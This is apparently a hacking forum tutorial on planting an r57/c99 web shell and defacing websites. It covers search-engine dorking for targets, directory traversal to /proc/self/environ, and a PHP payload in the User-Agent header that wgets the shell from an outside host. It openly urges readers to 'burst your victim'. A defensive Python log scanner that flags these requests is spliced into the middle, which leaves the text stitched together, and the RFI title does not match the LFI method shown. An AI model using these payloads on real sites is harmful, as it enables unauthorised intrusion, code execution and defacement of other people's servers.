Tut: Remote File Inclusion (RFI).
What you need.
No. 1: Mozilla Firefox.
No. 2: Tamper Data (it's a Firefox addon, Google it).
No. 3: A shell (r57 or c99 recommended, Google it). Upload it on free hosting as .Txt.
I upload mine at the place given below; do the same and it will work fine, see step 4.
No. 4: An account on drivehq.Com. Upload your shell there as .Txt.
No. 5: A vulnerable website and a little brain.
Let's start.

Dork :.Php?Page-contact.Php
You will find plenty of sites, but very few are vulnerable; it's your luck. Be patient and you will find a vulnerable website.

Now the website you select will have this at the end: /page=career.Php.
Then replace what comes after page= with this
../../../../../../../../../proc/self/environ
(Add as many ../ as you like, a few extra, 10 or 12.)
Your link will look like this
www.Web.Com/page=../../../../../../../proc/self/environ
As soon as you press enter, a strange code will appear on the website. If this code appears, the website is vulnerable, so carry on. If no code appears, try the next website.

As I said, your shell should be uploaded somewhere in .Txt format. I do it on drivehq. Now we make the LFI string.
Now the LFI string would be
<?system('wget http://www.Web.Com/shel.Txt -o shell.Php');?>
Here www.Web.Com/shel.Txt is your shell link, wherever you uploaded your shell. When I did this I used drivehq.

OK. Write the LFI string in Notepad. Then, on the page where the code was showing (after typing the ../../), go to the options and turn Tamper Data on. Then in Tamper Data click Start Tamper. A window will pop up right away; click Tamper there.

After clicking Tamper another window will open; put the LFI string into USER AGENT there. Paste the LFI string.
Then click OK. Then click Stop Tamper in Tamper Data, or close it.
You have done it.
Open Www.Site.Com/shell.Php and your shell will execute on the website.
Bingo. . . .
Now enjoy hacking and burst your victim.
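From the defending side, the two requests described above (a `page=` value that climbs to /proc/self/environ, and a User-Agent that carries PHP code instead of a browser string) both land in the web server's access log. The scanner below is an added example, not part of the original post; it assumes Apache/nginx "combined" log format, and the log lines, addresses and the harmless PHP string in them are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Two or more "../" segments followed by proc/self/environ.
TRAVERSAL_RE = re.compile(r'(\.\./){2,}.*proc/self/environ', re.I)
# A PHP open tag has no business in a User-Agent header.
PHP_TAG_RE = re.compile(r'<\?(php|=|\s*\w+\s*\()', re.I)

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so %2F and %252F forms are both normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_number, client_ip, [reasons]) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        reasons = []
        if TRAVERSAL_RE.search(fully_unquote(m['uri'])):
            reasons.append('traversal-to-environ')
        if PHP_TAG_RE.search(m['ua']):
            reasons.append('php-in-user-agent')
        if reasons:
            findings.append((number, m['ip'], reasons))
    return findings

# Constructed sample log lines (documentation-range addresses).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2024:10:00:00 +0000] "GET /index.php?page=career.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php?page=../../../../../../proc/self/environ HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:40 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 812 "-" "<?php echo 1; ?>"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A client that trips both rules on one request is performing the sequence in this tutorial. The lasting fix is on the application side: resolve the `page` parameter against a fixed allowlist of templates rather than using it as a file path.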

Let's deface. Make sure the shell shows public_html.
If not, go to this directory by executing a command. Usually you will already be in it.
The shell will have an upload option. Upload your deface page with the name index.Html.
Check whether it uploaded or not.
Www.Site.Com/index.Html. If the deface page opens,
then the shell will be showing all the files. Find the file named index and delete it. Then your deface page will show here.
Www.Site.Com
End. . . . .
